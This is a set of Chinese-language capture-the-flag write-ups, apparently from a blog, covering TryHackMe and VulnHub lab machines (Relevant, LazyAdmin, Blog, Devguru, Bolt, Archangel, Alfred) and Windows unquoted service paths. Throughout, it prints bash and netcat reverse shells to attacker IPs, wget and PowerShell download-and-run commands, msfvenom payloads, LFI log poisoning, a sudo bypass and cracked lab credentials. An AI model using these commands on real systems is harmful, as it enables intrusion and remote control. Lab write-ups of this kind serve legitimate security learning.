| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-08-08T23:00:47-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-09T06:00:49
|_ start_date: 2021-08-09T05:58:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.72 seconds

發現應該是 Winodws Server 2016 的機器

觀察網頁

去看 80 Port
是一個 IIS 的 Default Page掃目錄- python3 dirsearch.py -u http://10.10.115.198/
看起來沒什麼結果

觀察 SMB

smbclient --no-pass -L //10.10.115.198/可以觀察到有一個 nt4wrksv 目錄
smbclient -N //10.10.115.198/nt4wrksv- 就連上ㄌ
get passwords.txt觀察 passwords.txt 檔案-
會發現是編碼過後的東西，後面有 == 所以很明顯是 Base64Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk解 Base64- 可以用 base64 -d 嘗試把帳密用 RDP 連線- xfreerdp +drives /u:Bob /v:10.10.115.198`
xfreerdp +drives /u:Bill /v:10.10.115.198
但也都失敗ㄌQQ嘗試連線 SMB-
但也都失敗了

搜尋更多的 Port

rustscan -a 10.10.115.198 --accessible -r 1-65535
發現真的有藏東西!!49669
49663
49667這邊我同時用 nmap 跑了一次，不過真的有夠慢QQ- nmap -p- 10.10.115.198
nmap -A -p49669,49663,49667 10.10.115.198-
發現 49663 是一個 IIS webserver掃目錄- python3 dirsearch.py -u http://10.10.115.198:49663/
掃到 aspnet_client
搜尋發現 aspnet_client/system_web 裡面常常會搭配一些特定字串https://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html?view=flipcard所以可以再依據字串掃一次-
還真的掃到了 4_0_30319

通靈掃描QQ

不知道為什麼機器死掉ㄌ，重新開的 IP 是 10.10.63.244
我們如果隨便訪問一個不存在的目錄，會回應404curl -I http://10.10.63.244:49663/12334/
通靈覺得，說不定 webroot 有剛才 smb 的資料夾?- curl -I curl -I http://10.10.63.244:49663/nt4wrksv/
200! 還真的有!!那我們是不是能取得剛剛 passwords.txt 的檔案- http://10.10.63.244:49663/nt4wrksv/passwords.txt
度ㄉ!!真的可以!!!!!

準備 Exploit

那我們應該可以用匿名登入的 smb 來上傳東西囉!準備一隻喵喵smbclient -N //10.10.63.244/nt4wrksv- 嘗試用瀏覽器訪問!-
成功!!!既然他是 IIS ，又是 ASPX，那我們應該可以傳個 aspx 的 webshell?- 網路上隨便找了一ㄍhttps://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.aspx
丟上去
可以ㄟ!!!-
好讚ㄛ可以看系統的資訊ㄌ- 亂逛系統- 輸入指令 “cd ……\Users\Bob\Desktop && dir”![](https://i.imgur.com/hZrXxtO.png)取得 user flag- "cd ..\..\..\Users\Bob\Desktop && type user.txt"

戳 Reverse shell

雖然 Webshell 已經滿好用的了，但Reverse shell 用起來還是比較爽，我們來嘗試使用 Reverse shell
下面提供了滿多我嘗試的方法，但大多數都失敗ㄌ，僅有最後一個成功，不過我把失敗的方法也都列出來

Lazy Admin Final (Try Hack Me Writeup)

Tue, 10 Aug 2021 13:00:00 +0800

URL : https://tryhackme.com/room/lazyadmin

IP : 10.10.40.99

Scan

根據套路，先掃 Portnmap -A 10.10.40.99
發現有開 80 跟 22觀察網頁- 80 port 是一個 Apaphe 在 Ubuntu 上的 Default page
掃路徑- python3 dirsearch.py -u http://10.10.40.99
掃到一個 /content
http://10.10.40.99/content/上面寫說他是 SweetRice CMS
根據 /content 繼續掃會找到- 裡面有一個 Change Log
http://10.10.40.99/content/changelog.txt
裡面有寫到他的版本是 1.5尋找 Exploit- 找到了適用的 Exploit，不過需要使用者帳號跟密碼
https://www.exploit-db.com/exploits/40716繼續掃路徑- 找到一個 mysql_backuphttp://10.10.40.99/content/inc/mysql_backup/
裡面有一個備份的 SQL 檔案
內部有一些看起來是 PHP 序列話的東西5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";
看的出來admin : manager
passwd : 42f749ade7f9e195bf475f37a44cafcb透過 Google 尋找- Sweet Rice CMS 的後台是 /as
http://10.10.40.99/content/as/嘗試登入- 帳號 : manager
密碼 : 42f749ade7f9e195bf475f37a44cafcb登入失敗
正常人也不太可能用這種東西作為密碼
拿去 Google 後發現是 MD5可以透過這個網站解碼 https://md5.gromweb.com/?md5=42f749ade7f9e195bf475f37a44cafcb
所以答案是 Password123登入成功

Exploit

下載檔案wget https://www.exploit-db.com/download/40716 -O 40716.py``python3 40716.py 執行並輸入需要的資料- 10.10.40.99/content
manager
Password123
webshell.php5這邊我嘗試了 webshell.php 但是失敗
根據Exploit提示的改用 webshell.php5 就可以ㄌ
使用 Webshell- 可以成功連上改接 Reverse shell- http://10.10.40.99/content/attachment/webshell.php5?A=wget%2010.13.21.55:8000/s%20-O%20/tmp/s
本地端執行 nc -nlvp 7877
網址shell bash /tmp/s
就順利接上ㄌ取得 Flag-

準備提權

家目錄看到一組帳號密碼，先存下來
rice:randompass透過 sudo -l 發現我們可以用 sudo 執行這一段 Perl-
而這一段 perl 會用 sh 呼叫 /etc/copy.sh觀察 ls -al /etc/copy.sh- 可以發現我們有 Write 的權限
先把 /etc/copy.sh 備份一下以免搞壞- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
寫入我們的 Reverse shell- echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" > /etc/copy.sh監聽 Reverse shell- nc -nvlp 7878執行 Reverse shell- sudo /usr/bin/perl /home/itguy/backup.pl取得 Root- 取得 Root Flag

Blog (Try Hack Me Writeup)

Sun, 08 Aug 2021 23:53:00 +0800

URL : https://tryhackme.com/room/blog

IP : 10.10.175.75

Recon

老梗先用 rustscan 掃一下rustscan -a 10.10.175.75
可以看出開的 port 有22
80
139
445接下來用 nmap 做進一步的掃瞄- nmap -A -p22,80,139,445 10.10.175.75
可以看出http-generator: WordPress 5.0What version of the above CMS was being used?- 5.0What CMS was Billy using?- WordPress

Web

在文章內容中，可以看到有兩個作者Billy Joel帳號 :bjoelKaren Wheeler- 帳號 : kwheel
Joel 的媽媽發現網頁會自動跳轉到 blog.thm- 這是 Wordpress 的一個問題，第一次進入就會在 DB 寫死 Domain name 並自動跳轉
我們可以透過修改 /etc/hosts 把 IP 綁上 domainsudo vim /etc/hosts
裡面加上一行 10.10.175.75 blog.thm用 dirsearch 掃一次看看- python3 dirsearch.py -u http://blog.thm/
沒有什麼特別的結果，就是 Wordpress 該有的東西而已使用 WPScan，一款針對 Wordpress 的掃描器- 可以掃描出該網站有使用哪一些套件等
wpscan --update
wpscan --url http://blog.thm

└─$ wpscan --url http://blog.thm
_______________________________________________________________
 __ _______ _____
 \ \ / / __ \ / ____|
 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
 \ /\ / | | ____) | (__| (_| | | | |
 \/ \/ |_| |_____/ \___|\__,_|_| |_|

 WordPress Security Scanner by the WPScan Team
 Version 3.8.17
 Sponsored by Automattic - https://automattic.com/
 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.thm/ [10.10.175.75]
[+] Started: Sat Aug 7 01:16:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 | - /wp-admin/
 | - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 | - http://codex.wordpress.org/XML-RPC_Pingback_API
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 | - https://www.iplocation.net/defend-wordpress-from-ddos
 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 | - http://blog.thm/feed/, https://wordpress.org/?v=5.0
 | - http://blog.thm/comments/feed/, https://wordpress.org/?v=5.0

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 | - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:16 (137 / 137) 100.00% Time: 00:00:16

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 7 01:17:25 2021
[+] Requests Done: 170
[+] Cached Requests: 7
[+] Data Sent: 40.812 KB
[+] Data Received: 322.273 KB
[+] Memory used: 213.184 MB
[+] Elapsed time: 00:00:51

可以發現 wp-content/oploads 目錄沒有鎖前面有發現 Wordpress 的版本是 5.0- 上 searchsploit 尋找看看有沒有可以用的 Exploit
wget https://www.exploit-db.com/download/49512 -O 49512.py
然而執行起來發現需要帳號密碼，所以就暫時先放一邊

SMB

前面 nmap 發現他有開 SMB 的 port來掃看看 smbmap -H blog.thm
可以發現有開一個Disk 叫做BillySMB也可以用 smbclient -L //blog.thm 列出裡面的資訊- 由於 SMB 可以使用匿名登入，所以詢問密碼只要直接按下 Enter即可
如上截圖，發現會出現一個 SMB1 Disable 的錯誤- 依照下列網址方式處理https://dalemazza.wordpress.com/2020/04/20/nt_status_io_timeout-smb-error-and-how-to-fix-it/修改 /etc/samba/smb.conf-
在 [global] 裡面增加一行client min protocol = NT1就可以正常使用ㄌ輸入 smbclient -N '//blog/thm/BillySMB'- 可以直接進入 SMB 的 CLI輸入 ls 觀察裡面的資料- 輸入 get {檔名} 依序把檔案拔出來- 發現裡面有一張 QR Code- 網路上找一個 QR 轉換器然而只是一個普通的 Youtube 連結其他也都只是滿無聊的圖檔，沒有什麼特別

爆破密碼

爆破密碼很無聊，但有時候很有用針對 Wordpress 可以用 wpscan 內建的爆破方法我們先準備一個 user.txt 裡面有兩行，分別是兩個使用者bjoel
kwheel``wpscan --url http://blog.thm/ -U user.txt -P /opt/rockyou.txt- 接下來使用 -U 配使用者名稱檔案
-P 配密碼字典檔來未看先猜一下，爆出來比較有機會的是 kwheel- 因為是開發者的媽媽，老人家資安意識比較差
~~抱歉我就歧視~~等了十幾分鐘，真的成功的爆出了密碼!!- kwheel / cutiepie1
果然老人家愛用弱密碼接下來到 /wp-admin 準備登入-
也就真的順利登入了!!不過我們的使用者是 editor沒有權限可以修改 template 之類的方法取得 RCE

嘗試 exploit-db 的 Payload (失敗)

先講結論，失敗了，我也不知道為什麼 QQ我已經完全照著網路上的方法做
但是還是怪怪ㄉ QQ使用先前載好的 https://www.exploit-db.com/download/49512依照提示準備一個 gd.jpg- cp Alice-White-Rabbit.jpg gd.jpg
這邊我直接使用 smb 偷出來的圖片用 exiftool 寫入 shell- exiftool gd.jpg -CopyrightNotice=""
在這邊我們可以用 strings 觀察，檔案真的被寫進去了修改原始碼的 lhost 與 lport-
python3 49512.py http://blog.thm/ kwheel cutiepie1 twentytwenty
nc -nvlp 7877
然而，都失敗了QQQ

使用大絕招 msf !!

輸入 msfconsole``use exploit/multi/http/wp_crop_rce
show options觀察需要的參數set PASSWORD cutiepie1``set USERNAME kwheel``set RHOSTS blog.thm``set LHOST 10.13.21.55``exploit- 就成功接上了 meterpreter 的 shell- 但這邊我還是想使用普通的 reverse shell
所以我們就輸入 shell 切換進入再來我想接回 reverse shell- 在攻擊機輸入 nc -nvlp 7877
meterpreter 輸入bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
就可以順利接回 shell然而在使用者的家目錄看到的 user.txt 是假的 QQ沒關係，我現在懶得找，等有 root 後再說ㄅ觀察使用者家目錄有一個 pdf 檔案，抓出來研究看看- 攻擊機 nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf
靶機 `nc 10.13.21.55 1234

準備提權

使用常常出現的工具 linpeaswget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh
我們可以找到 wordpress 的資料庫密碼
LittleYellowLamp90!@發現 sudo 版本是 1.8.21- 發現一個奇怪的檔案有 suid- 檔案路徑是 /usr/sbin/checker
觀察 Checker- 先把檔案傳出來攻擊機 nc -l -p 1234 > checker
靶機 nc 10.13.21.55 1234 使用 r2分析-r2 checker`
aaa
s main
VV
可以發現他會把 admin 傳入 getenv
然後如果有值就會給我們一個 shell回到攻擊機，給予一個 admin 的環境變數- admin=meow /usr/sbin/checker
就拿到 root shell 了
取得 root flag-
9a0b2b618bef9bfa7ac28c1353d9f318等等 … 阿user flag ㄋ- 好懶得翻ㄛ…我們就暴力搜ㄅ
find / -iname user.txt -print 2>/dev/null可以找到 user flag 藏在 /media/usb/user.txt-
c8421899aae571f7af486492b71a8ab7

Devguru (VulnHub Writeup)

Sun, 08 Aug 2021 23:17:00 +0800

URL : https://www.vulnhub.com/entry/devguru-1,620/

IP : 192.168.1.138

覺得打 Tryhackme 也一陣子了，可以回來打打看 VulnHub 的 OSCP 模擬題試試水溫，不過看樣子打起來還是有一點辛苦QQQ

部屬機器

載下來解壓縮後，是虛擬盒子的 OVA，開虛擬盒子，網路改橋接試試看很棒，這台機器自動的告訴我們 IP 惹，不需要用奇怪的方法來找 IP

Recon

先掃 Portrustscan -a 192.168.1.138
發現有開 22,80,8585nmap -A -p22,80,8585 192.168.1.138- 用 nmap 大致掃一下python3 dirsearch.py -u http://192.168.1.138/- 用 Dirsearch 掃描，觀察看看有沒有什麼有趣ㄉ東西
發現他的 .git 竟然存在，可以嘗試用 Githack 把資料復原
還有一個 adminer 是類似 PHP My Admin 的東西觀察 80 port-
是一個叫做 October 的 CMS
而 Adminer 版本是 4.7.7觀察 8080 port- 是一個 Gitea 版本是 1.12.5
版本有符合的 Exploithttps://www.exploit-db.com/exploits/49571
wget https://www.exploit-db.com/download/49571 -O 49571.py
發現執行的話需要密碼，所以先放一邊留存- 發現一個唯一的使用者叫做 frank
他沒有公開的 repoGithack- git clone https://github.com/lijiejie/GitHack
python GitHack.py http://192.168.1.138/.git/復原之後覺得裡面的資料滿多的，亂晃一下發現有趣的東西
資料庫密碼- 帳號 : october
密碼 : SQ66EBYx4GT3byXH`
資料庫名稱 octoberdb嘗試使用 Adminer 登入- http://192.168.1.138/adminer.php
發現可以順利登入

破解 Hash 成功登入

觀察 Backend Users 發現了一組使用者以及密碼 hash
使用者名稱 : frank
密碼 Hash : $2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK觀察網站- http://192.168.1.138/backend/backend/auth/signin
使用 frank 做為帳號登入
但我們需要知道密碼是什麼 QQQ暴力破解?- john frank.txt --wordlist=rockyou.txt
在我家的超級電腦跑了 10 分鐘也沒有結果，看起來應該不是
這到底是什麼 hash?- 使用這個網站 https://www.tunnelsup.com/hash-analyzer/
貼上 hash 值$2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK可以自動分析出他叫做 bcrypt我們可以尋找 bcrypt 的產生器，幫我們產出一組符合規格的 hash- https://bcrypt-generator.com/
我們隨便輸入一組密碼
meowmeow12345他就產出惹$2a$12$LnBY8Lzpcq1/Z90x41QZT.fkJKfcWvFtYzQc9Ex4vzAHSvFLn6.Ce但登入卻一直噴錯 QQ繼續挖 DB 會發現帳號被 suspend 了QQ那我們就直接把這一筆刪掉ㄅ !!另外還觀察到使用者的 DB 裡面有一組 persist_code- 暫時不知道是幹嘛的，先存下來備用
$2y$10$hnhKQ8hTe9b3SoZgXhBuT.HG17VvEdBXe86hEq1qdIknkcM1rbxYi順利登入 CMS- 想試試看在上傳檔案的地方上傳 webshell
或是透過修改檔名之類的方法先傳 .txt 再改 .php 都失敗
SSTI- 在 CMS 的 Assets 地方發現可以 SSTI
輸入錯誤的資料會爛掉
從 Debug 頁面可以看出他是使用 TWIG 做為模板引擎嘗試使用一些測試的 Payload但大多數都失敗 QQ插入 Command- 在 October CMS 上，可以看到
https://octobercms.com/docs/cms/pages
可以直接插入 Codephp function onStart() { system($_GET['A']); }
然後就成功ㄌ!

進入系統

嘗試用 Command 載 reverse shell192.168.1.138/?A=wget 192.168.1.106:8000/s_l -O /tmp/s
戳 Reverse shell- nc -nvlp 7877
成功!LinPeas- wget 192.168.1.106:8000/linpeas.shbash linpeas.sh- 找到可能有用的密碼!!
把密碼檔案用 nc 傳出來- nc -l -p 1234 > meow
`nc 192.168.1.106 1234

登入 Gitea

登入 SQL 觀察使用者
發現是一種 pbkdf2 的 hash 演算法hash :c200e0d03d1604cee72c484f154dd82d75c7247b04ea971a96dd1def8682d02488d0323397e26a18fb806c7a20f0b564c900
salt :Bop8nwtUiM
passwd_hash_algo : argon2觀察 hash 長度- len("c200e0d03d1604cee72c484f154dd82d75c7247b04ea971a96dd1def8682d02488d0323397e26a18fb806c7a20f0b564c900")
長度是 400 bits = 50 BytesGoogle 到 pbkdf2 的產生器產密碼- https://neurotechnics.com/tools/pbkdf2-test
但後來登入都失敗了 QQ去 Github 上搜尋 passwd_hash_algo 找到了別人現成的 hash- https://github.com/go-gitea/gitea/blob/22a0636544237bcffb46b36b593a501e77ae02cc/models/fixtures/user.ymlpasswd:`a3d5fcd92bae586c2e3dbe72daea7a0d27833a8d0227aa1704f4bbd775c1f3b03535b76dd93b0d4d8d22a519dca47df1547b # password- 該 hash 值就是 passwordsalt: ZogKvWdyExpasswd_hash_algo: argon2`把他們填進去 SQL 中http://192.168.1.138:8585/user/login?redirect_to=-
frank / password
嘗試登入，就登入成功ㄌ!使用剛剛前面載的 Exploit- https://www.exploit-db.com/exploits/49571
nc -nvlp 7879
python3 49571.py -t http://192.168.1.138:8585 -u frank -p password -I 192.168.1.106 -P 7879
但都打不進去 QQ觀察使用者的 Git- 觀察到他有用 githook 做 CI/CD所以可以試著在這邊 bash 上加 reverse shell- bash -c 'bash -i >& /dev/tcp/192.168.1.106/7879 0>&1'
改完之後會發現 update 亮綠燈接著來亂改他的 readme.md 、發 Commit- 成功拿到使用者的 Shell!

提權

sudo -l 觀察
發現我們可以用 sudo 執行 sqlite3再跑一次 Linpeas-
看起來沒什麼特別，但我們可以注意 sudo 版本sudo -V-
發現是 1.8.21p2 版本CVE-2019-14287
可以用 sudo -u#-1 binary 來繞密碼GTFOBins 可以找到 SQLite3 的 sudo 利用方法- https://gtfobins.github.io/gtfobins/sqlite3/#sudo
串成完整的 Payloadsudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'執行!!- 取得Root Flag-

Bolt (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:56:00 +0800

URL : https://tryhackme.com/room/bolt

IP : 10.10.51.13

Recon

rustscan -a 10.10.51.13
發現有開22
80
8000nmap -A -p22,80,8000 10.10.51.13- 觀察網頁- 808080- What port number has a web server with a CMS running?- 8000What is the username we can find in the CMS?-
boltWhat is the password we can find for the username?-
boltadmin123``python3 dirsearch.py -u http://10.10.51.13:8000/ -e all- http://10.10.51.13:8000/.htaccess裡面沒什麼特別網路上找到後臺網址- http://10.10.51.13:8000/bolt/login
What version of the CMS is installed on the server? (Ex: Name 1.1.1)- Bolt 3.7.1
上一張截圖最下面有寫Google Bolt 3.7.1 Exploit- https://www.exploit-db.com/exploits/48296
wget https://www.exploit-db.com/download/48296 -O 48296.pyThere’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?- 48296
不知道為什麼，我 run 起來失敗QQ網路上找到另外一組 exploit- https://medium.com/@foxsin34/bolt-cms-3-7-1-authenticated-rce-remote-code-execution-ed781e03237b
他莫名的把我的密碼改成 password 了
但是也沒有用 ?__?改用 msf- search bolt找到了第 0 個 RCE 的use 0``set PASSWORD password``set USERNAME bolt``set RHOSTS 10.10.51.13``set LHOST tun0``show optionsexploit-
成功 RCE 取得 flag-
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Archangel (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:48:00 +0800

url : https://tryhackme.com/room/archangel

IP : 10.10.163.60

Recon

起手式，掃 Port rustscan -a 10.10.163.60
80 , 22掃路徑 python3 dirsearch.py -u http://10.10.163.60/ -e all- 觀察網頁首頁，發現裡面有 /flag-
點進去後 ……
幹…
用 curl 觀察
他會自動跳轉到這邊 https://www.youtube.com/watch?v=dQw4w9WgXcQ

Dfferent Hostname

題目提示 : Find a different hostname
可以觀察 mafialive.thm``sudo vim /etc/hosts- 加上這一行 10.10.163.60 mafialive.thm
接下來到 http://mafialive.thm/
就拿到了 flag再掃一次路徑python3 dirsearch.py -u http://mafialive.thm/ -e all- http://mafialive.thm/robots.txt
/test.phphttp://mafialive.thm/test.php
觀察按下按鈕後的網址- http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php
感覺很明顯可以 LFI嘗試 Base64 Payloadhttp://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php
成功 !!
觀察 test.php 原始碼http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

INCLUDE
 Test Page. Not to be Deployed

 Here is a button

又撿到一個 flag thm{explo1t1ng_lf1}觀察原始碼發現，網址裡不能出現 ../.. 且一定要出現 /var/www/html/development_testing``../.. 可以用 .././.. 繞測試 curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd成功!!來看 apache access log- /var/log/apache2/access.log
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
成功 !!
往上拉發現所有的 host log 都在這邊，所以可以直接針對 ip 來做 nc 寫 phpnc 10.10.163.60 80
GET /?
再回去看一次 access log- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
成功出現 phpinfo !!
寫入 webshell- nc 10.10.163.60 80
GET /
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&A=ls![](/uploads/2022/02/ea69f-JHfk4lv.png)下載 reverse shell- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=wget 10.13.21.55:8000/s -O /tmp/s
本地準備監聽 nc -vlk 7877
執行 shell http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=bash%20/tmp/s
成功接上
使用 python 讓 terminal 變漂亮- python3 -c 'import pty; pty.spawn("/bin/bash")'找 user flag-
thm{lf1_t0_rc3_1s_tr1cky}找到使用者資料夾內有 passwordbackup-
幹…再一次
等……等等，不會吧
該不會那個網址真 TM 是他的密碼 ?__?
好的，好險不是使用 Linpeas 掃- wget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh找到一個可疑的 cron job發現這個 cron 會使用 archangel 來執行，而且我們對 /opt/helloworld.sh有讀寫權限寫入 reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh等待一分鐘後，自動接上!!-
找到 flagthm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}觀察使用者中的 secret 資料夾中- 有一個 backup 檔案有 suid透過 nc 把檔案傳出來- 監聽端 nc -l -p 1234 > meow
發送端 nc 10.13.21.55 1234 哼!這種等級的 reverse，連 ida 都不用開，我們用 r2 就好ㄌ- r2 meow`
aaa
s main
VV
可以看到他會用 system call 一個 cp
而 cp 沒有寫絕對路徑，所以可以用 path 進行誤導

誤導 path

在家目錄創一個 fakepathmkdir fakepath
export PATH=/home/archangel/fakepath:$PATH準備一個假的 cp 檔案- echo '#!/bin/bash' > cp
echo "/bin/bash" >> cp
chmod +x cp執行 backup- ./backup取得 root 權限 !!- thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}

Alfred (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:45:00 +0800

URL : https://tryhackme.com/room/alfred

IP : 10.10.244.238

Initial access

rustscan -a 10.10.244.238
80
3389
8080nmap -A -p80,3389,8080 10.10.244.238-
發現 8080 的 Jenkins 是Jetty 9.4.z-SNAPSHOT
但找不到相關的 Exploit80 port 首頁-
看起來沒什麼特別的東西QQ
python3 dirsearch.py -u http://10.10.244.238/掃了之後也沒啥東西8080 port 登入頁面-
發現會掃出一些404，但沒啥幫助

進入 Jenkins

看到官方的 hint 寫 *****:*****直接通靈猜 admin:admin
就進去了 ……
好無聊= =透過 Deploy 的 build code 輸入指令- whoami
systeminfo
準備 Windows Reverse Shell- 本機wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
nc -nvlp 7877靶機- powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.21.55:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.21.55 -Port 7877就成功接上了- 取得 uesr flag- 使用 msfvenom 產 meterperter reverse shell- msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.21.55 LPORT=7879 -f exe -o meow.exe
開啟 msfconsole 準備接收- use exploit/multi/handler
set LHOST 10.13.21.55
set LPORT 7879
set PAYLOAD windows/meterpreter/reverse_tcp
show options 確認參數是否正確
run 等待接收下載並執行 meterpreter 的 shell- powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.21.55:8000/meow.exe','meow.exe')"
Start-Process "meow.exe"msf 接上了!- What is the final size of the exe payload that you generated?-
73802meterperter- getuid回傳 Alfred\bruce``load incognito``list_tokens -g-
發現可以利用 BUILTIN\Administrators``impersonate_token "BUILTIN\Administrators"- 成功!
再次 whoamiMigrate 到 system- ps
準備寄生到 services.exe``migrate 668-
成功!輸入 shell- cd system
type root.txt
取得 root flagdff0f748678f280250f25a45b8046b4a

Windows Unquoted Services Path

Thu, 05 Aug 2021 23:31:00 +0800

顧名思義，這是一個 Windows 服務上面的漏洞。找到符合沒有加上引號的路徑很常見，但是真正能夠運用的機率不一定很多，因為前提是還需要注意相關路徑的寫入以及讀取權限。

使用前提：檔案的路徑中有空格
而且檔案沒有用引號括起來
對於該檔案的前一個目錄具有寫入的權限

達成這兩個前提就有機會可以實作 Unquoted Services Path 相關的漏洞應用，但通常在 XP 以後的作業系統，預設普通使用者沒有 C:\ 的寫入權限，所以大多數狀況都不適用；而使用者也須要具備對於該 Services 的開啟與關閉權限。

先備知識，觀察權限AccessChk
Services 權限accesschk.exe /accepteula -ucqv {services_name}
資料夾權限- accesschk -uwdq "C:\Program Files (x86)"

觀察

wmic

輸入 wmic service get name,pathname可以觀察到所有服務的名稱與檔案名稱
輸入 wmic service get pathname,startname- 可以觀察到程式名稱與執行者名稱(startname)
在此， startname 若為 LocalSystem 則代表有 system 權限

Winpeas

Winpeas 也有這種相關提示No quotes and Space detectd

實作與解釋

假設我們看到一個 Path 如下所述
C:\Program Files (x86)\meow\meowmeow 8.7\meoewww.exe

我們可以發現路徑依序為Program Files (x86)Windows 會先嘗試解釋為 Program.exe 再解釋 Program Files (x86)``meow``meowmeow 8.7- Windows 會先嘗試解釋為 meowmeow.exe 再解釋 meowmeow 8.7``meoewww.exe

在這段路徑中，我們觀察路徑的空白會發現，有兩個可以利用的點，分別是路徑中有空白的Program Files (x86)以及meowmeow 8.7

Wonderland (Try Hack Me Writeup)

Thu, 05 Aug 2021 13:30:00 +0800

URL: https://tryhackme.com/dashboard

IP : 10.10.166.15

Recon

一直 nmap 太老梗太無聊了來玩玩新東西 RustScan
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
